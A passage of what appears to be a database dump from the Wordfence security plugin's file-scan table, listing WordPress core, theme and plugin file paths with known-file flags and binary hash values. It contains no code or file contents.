������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Ɓ.����o���O#','d�{�_�U��R7I���o�(�~�6,\rT���\n��','',0,'?'),('�S�\\��fI_��O�','wp-content/themes/hitmag/inc/kirki/assets/js/l10n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�Sve�䤀��tQ�','����3�R�{��s�w��\r+Y~\0e�Ó=թ$','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n��	-*���^e\"e�(_,g','',0,'?'),('�_)-�]�ˌkO	��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt���	\'S_��̄E�s��_�)^�','',0,'?'),('�gϬ��=wJ�����S','wp-content/themes/singularity/inc/customizer-library/extensions/interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�8Ȓ@����]','��wX�}��Sv2.�Z\"l4%��\\�����Ԡ','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T	','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('Ύ0��\0b��]�4�','wp-content/themes/the-best/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�|�b���}���	4$','��.n�h��1�$P$x�B�e1�W�6ì��','',0,'?'),('ΎT��8\"Yt��.8','wp-content/themes/singularity/template-parts/headers/header-standard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bY=B�)q��{5�\0','1()Y�1�fvQ\'Nx�����܇J�x({%�G�','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('ΰ����*��:��>�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����qQR	�X?\Z�B','M430��+?�ŎkV.a��ˀ<\n�����N�!','',0,'?'),('α�Z	��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('ι��\n���`Z��X�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('��ݽ�KӾ�S\"�\r�U�','wp-content/themes/exoplanet/images/exoplanet-placeholder.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͱ*-82����6�\\6','�j�p� 6��_�����Y��\'`\'B���t�5�','',0,'?'),('��-�e�����V�=`','wp-content/themes/wp-simple/inc/kirki/kirki/assets/css/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[^��Q�Ǫ\r:;�5','��˝?��#�O	��C�M���\\�\n�\0VY','',0,'?'),('�Ѻ0x�� t\\����','wp-content/themes/skt-pathway/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��R=:lpp����','���qRX�rbFM�[��NH`�ծoKf�7I','',0,'?'),('���v���p����$','wp-content/themes/hitmag/inc/customizer/assets/imgs/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�l��z���ޝ��','����;���x�6<\Z�\"��Pt�b� l�	','',0,'?'),('����C-�7�:��\"','wp-content/themes/education-hub/inc/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R	�#�1\n2�-�','����2�dU >Wܗ+�~تǰ��*A�','',0,'?'),('��ޏS�G�/��6!��-','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/dimension.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�d�8o*2�1�o�D�;','�;�d�A\'	A��@�f�*�P<(�Q�m��y','',0,'?'),('��\Z��\0��a���+τ','wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oB,2�kM�@�|�','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('��\n��*Srk��D,�','wp-content/themes/graphene/images/social/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ݰ4#���(��ˤ','Q�^���\\��Tc*�+l{�%;ڟ�*���u�','',0,'?'),('�|%��69��K���','wp-content/themes/quicksand/template-parts/navigation-primary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yC<\0�v�整e','aE&Q��.�TIk�;�}��ҫ��ޅ�:\r�','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('�\n�X�8��#f�0�d','wp-content/themes/singularity/template-parts/content-single-discussion-topics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��j��u�Ə�e�','�N��b�	��Q�$.K��,\"�(�^\'�j�ި','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('�<��q��m$a@&%','wp-content/themes/monograph/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GE:�mY\'!N��l�P','��>�/�~���+��okTjᑐ�k�y�','',0,'?'),('�$��ʱ�<�k','wp-content/themes/edge/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�X�Z,\0�V����','t�r�G�:�N�.�����I��k�Cigs�H[$�','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ur�\\�٭l_��?�','��.�jflޛ���,&���ĸ�G��Ku�?���','',0,'?'),('�26�6�#	S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('�Cz/u���2/�Ň','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r:�g�,�u9{��\r4s','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m	N��G�)Iw��:�D','',0,'?'),('�_q ^��<�8��:�	','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��U�M�\rv4�GP','M$_��f#5�r�풗g��\0��ra���O�m�N','',0,'?'),('�cf�\nT+�:��G��H','wp-content/themes/city-store/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>\Z���0j+��^�','J�6J t��햳��Ds{����3�Œ剴','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('�xD#���G�yC���y','wp-content/themes/monograph/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2/����{����4l��','���1��� ��/����wC*���#�&|}��','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ρ�U��(�AP�@h��','wp-content/themes/gambit/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�:q{���*	\rcsD\0','��ikE�0p	�e���iJ��Q]����?�����','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$ج�o8؁)�c����','��\Z\Z���#9�#�H�;yό�:˙���#e','',0,'?'),('Ϝ鵦+�@��K�H','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/mode/simple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�uT��i)�\n�4V�','k�d��E���M��(S$�Lh搖#L{.#c?�','',0,'?'),('ϝ���M�f�,�x�','wp-content/themes/weblog/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���M�Ln���V�uh',']�!R*����\r�,/`W�܂z��X����','',0,'?'),('ϝf#��~��,C�� ','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���Xs}��D�K�\0','�F\0A�5	I[�z��b̧�{���p�]�s�','',0,'?'),('ϦޅO�h#;�?���8d','wp-content/themes/catch-responsive/js/source/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!E��fC�5','�]`��30���ngsˁ�&����S�xnFF�','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('����, �Wt��','wp-content/themes/catch-flames/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]L?/:ӓ�iVX','+.�}M�\r�-i������R`����-PT�c%','',0,'?'),('�ƹ��Ml����n\'','wp-content/themes/advance/js/unminified/jquery.easing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K&Ռ�s��hI�','.<��콋��h;s�6�ʸ�]Z�2��`$m�','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('��`�@��{�\'d(��P','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework.php',0,'n .��OTJ%~9M��O','n .��OTJ%~9M��O','�%挌C�[����;n~�/HǷ�p�!/�l�jo','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('�@��AO=	�yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ�	▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩	��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('���6���Љ���-\')','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']g���ȼy3҉s\r���','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�\'4��^:c����L�b�','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_rotated-flipped.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]K�ި�(Ҫ�et��','�8�n��K١�:����Q�v�S���n','',0,'?'),('�(A��qy�P�#�ڔ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/sass/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z���a�):f���','�u~��sC�&�f�H�:�/�X̱L�����]M�','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:�	','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�T޼q%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('�^��%\\��7�z���','wp-content/themes/hitmag/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�E���Olp��!{�b','�_��A��&�s׉qFZ��g�l�R%��V\00','',0,'?'),('�p�¼�ᆈ-+g�','wp-content/themes/university-hub/inc/hook/custom.php',0,'�7��Qك�ˑ��<\"','�7��Qك�ˑ��<\"','m;������\\0�����$C�}�̊CH��','',0,'?'),('�r \0U��N>\0jf�c�','wp-content/themes/graduate/inc/metabox/header-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}lz���tyx�Pޗ��','Rf��^HU\n�ZxBX�@�B��s���o5seV','',0,'?'),('�s��q@1��!٣�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/yaml-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�$�,=g���','��35�:�!���7u�6@1�*���\ZyN8�0*','',0,'?'),('�|�����i�y�ˉHO','wp-content/themes/catch-responsive/js/source/catchresponsive-customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��e~���6�z���',']�����(Px����-��c�u���U\\','',0,'?'),('Г=$�(�ȩ�U���','wp-content/themes/wp-simple/inc/kirki/assets/js/kirki-postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5��I����R�','~�i���v�:I*1��,�:��qM(\"W� 8��','',0,'?'),('Ж�o�`�)��kU�','wp-content/themes/simpleshift/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x4~~�\06ȄTLê�','ԚD{2Wn�1@5�F����N)`���4C#�','',0,'?'),('Н%O����s��n(','wp-content/themes/hemingway/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o��!u7��}�','���6PC�R����?�l���O���]!�%�P','',0,'?'),('Оq�&��|�=�B(','wp-content/themes/wp-simple/inc/kirki/includes/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�	F�*��m�X�da�','��Z�l��{��B�YIl�;1OK[�fIo��J�','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	�J<�g��o�9:x','�n�c���x0�ĥ���t��N���޾Y2X\0!','',0,'?'),('Ы6d}�/AQ�M?�Z	_','wp-content/themes/skt-pathway/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i[M�AD���{�','�e9-��2��@�S��M����= #�|U��','',0,'?'),('Э�����l���	��S�','wp-content/themes/advance/js/unminified/jquery.matchHeight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k!a.;ԅ\r��[�:E�','bkE���>C���F�i�_#�-B���K͚eKC','',0,'?'),('гD��3�,N��/D�','wp-content/themes/graphene/images/social/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�\0(\n�!��k','-����|��2�v�+>��o?@qVᚦ�p�','',0,'?'),('иn?���\"�xG��','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('й�	H�n����0����','wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޝ[kk�>S��B','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('л�����yV�Zz�F�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/styles/class-kirki-styles-output-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�PYu��x�u','��h��@���|�8��Z���Lni9��ʷ','',0,'?'),('��ґ����_�IEi�','wp-content/themes/metro-magazine/images/video-play-icon-hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q6���N<O�0^m8','���t�hn�`Ź���mf|�L�c���K�','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�߻V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('��צp�B+�`�����.','wp-content/themes/advance/images/lay_hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.{Il��#[er�_\"','LA�7�ޭ�)�\r��i��\\��~$H�яx','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('��\":v���zL�d�','wp-content/themes/advance/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�����	�%�P','�UT䑟��\n��\r����3 �U����ްH,�','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('�-��j+��+���l�a','wp-content/themes/catch-responsive/css/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�\' ��N깛���V','�?���ǵ�_-ϟ��b7b�\Z�	�\'�fp>UG\0','',0,'?'),('�=N6�B��]a�Υ�','wp-content/themes/advance/js/unminified/headhesive.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��\0�;#Q��o�g','�ZV�>�H��\'8�NE�[�d�P�i訫���X','',0,'?'),('�B<�\r�IS�,,�?VϨ','wp-content/themes/brickyard/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�sJ[W��/��JLi','Ԧ�7�R�VWY�wB��U$!����d&S�F��7','',0,'?'),('�UW�~/N��	�	�','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nԤ���榡..�X	','���`5�ş�wo���(^�5��U_�gJ�','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	��}�as�	����?�w','��K���yc��TsKfsb{���-	k�X��','',0,'?'),('�_�LP��0�K�f�D��','wp-content/themes/catch-flames/css/jquery.sidr.light.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�̖.,LuM���6','\\e	���v	E��=뒐��a\0`*��HR`�FI�','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8�	��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH	�','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('ф�]֘w`���;\r','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',v&ne��._C>�H','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('ј)�\"���dR���T','wp-content/themes/education-hub/inc/customizer/control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��Ue��� d}\rG','����lj���se���؏7��J#��SQD�','',0,'?'),('јB�ɵ�	��B4_[L>','wp-content/themes/event/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/e�D�۞�\Z�1v','��7p�	����L6\'dų#������b�O?�','',0,'?'),('љ5�X0�hTg���b�','wp-content/themes/newsmag/inc/customizer/settings/banners/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�*�x���NrҮ','gQl��\n����0��?��Ģ4+:Z��պy�8��','',0,'?'),('Ѱ��`�I���ݬ�s','wp-content/themes/graphene/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ēޒ�h14��6�>�i','c9�[�֫�!�*�wL�װy\"�Ց��}�\'�9','',0,'?'),('��u��.��os','wp-content/themes/brickyard/images/empty.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�lJ����v��','�����.�I����t��& �~�5K����','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'bXzYT=ZE��~��y��','bXzYT=ZE��~��y��','�/��{{I��M�\'D�E4��� �{��E��H\\��','',0,'?'),('����c����E�)U17','wp-content/themes/wp-simple/assets/images/search_icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*������UE0Wr','����$�M��K�\r�z�Gj�Y4|�\r�+-0��','',0,'?'),('�n\"DJ����%�#�-','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lu�Gn����/;k5,W','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('���K6e�\r5 7�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/midnight.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v5�/_���2�','0uu3OO-#XH����RD|W�R�x;�BiG˫','',0,'?'),('���rW\\�w��4�','wp-content/themes/wp-simple/inc/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}G��o�_��$N#��','��N��z��F�XQ��٭��&�u�b@��/','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 B��b4��8�Tb','g.	�YZ��:Y�(�m�<�bB6�<����hX\"�','',0,'?'),('�0o_�H	ͅ鍀�S','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YTЖb�%�����','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('�Am|��7��f��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�I=���\n�-�r�9','��M������;2h�%�~�!_�myt��;b','',0,'?'),('�VH�p�P=�3��`A','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bG\Z^y	��7\\sLd^7','#zR������:��+zb)��������~�','',0,'?'),('�eN�Ve���t%9d�q','wp-content/themes/simpleshift/parts/companion/frontpage-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��똺�}��-','��,8�>�{�<��d��Ͻ��k6o�ղ{e�','',0,'?'),('�g�6�g�+;\\6]�','wp-content/themes/singularity/page-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�rGM���(zt7','����r���-�o�t���#F�zXC�?{A','',0,'?'),('�oz��Mδ�;��?P','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/xml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/\Z����ߡ�\'�Ou�,','��!��Ӷ�	,���8�.�\"7��(�ØwH\r�qz�','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�[2� �[\r�','bK���76V��P9$GA;&e�k�����','',0,'?'),('�xoZ�l���mŏ�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/mode/loadmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<)����x[knok|','!�t+ik`��C��\\\"�ΆFq��s|I;z�2','',0,'?'),('�{�x>\0/���5��1ޕ','wp-content/themes/catch-flames/js/jquery.waypoints.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w���m��R����g,','���0\"v~�W�ʴB��¾�@�U�f16��%~�','',0,'?'),('҇��|��z���H��Y','wp-content/themes/skt-pathway/images/bullets.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�5�M�Z:��W<ݐ','I�H�7 R�����*ő�{���Ϭ��fC�BEC','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%